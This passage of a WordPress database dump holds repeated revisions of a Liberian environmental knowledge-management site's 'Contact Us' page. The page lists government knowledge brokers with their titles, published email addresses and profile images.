EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:44:14','2019-11-15 20:44:14','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2362,1,'2019-11-15 20:44:57','2019-11-15 20:44:57','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:44:57','2019-11-15 20:44:57','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2363,1,'2019-11-15 20:48:19','2019-11-15 20:48:19','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:48:19','2019-11-15 20:48:19','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2365,1,'2019-11-15 20:51:35','2019-11-15 20:51:35','','John K. Jallah','','inherit','open','closed','','knowledge_broker_jj','','','2019-11-16 03:51:05','2019-11-16 03:51:05','',80,'https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_JJ.jpg',0,'attachment','image/jpeg',0),(2366,1,'2019-11-15 20:52:04','2019-11-15 20:52:04','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_JJ.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_JJ.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_JJ-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:52:04','2019-11-15 20:52:04','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2367,1,'2019-11-15 20:52:24','2019-11-15 20:52:24','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:52:24','2019-11-15 20:52:24','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2368,1,'2019-11-15 20:54:21','2019-11-15 20:54:21','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:54:21','2019-11-15 20:54:21','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2369,1,'2019-11-15 20:55:52','2019-11-15 20:55:52','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or Fill out the form below:		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"knowledge_broker_KT\" alt=\"knowledge_broker_KT\" />											\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:55:52','2019-11-15 20:55:52','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2370,1,'2019-11-15 21:01:52','2019-11-15 21:01:52','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br />Send an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a>, fill out the contact form below or contact the EKMS knowledge brokers directly:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal 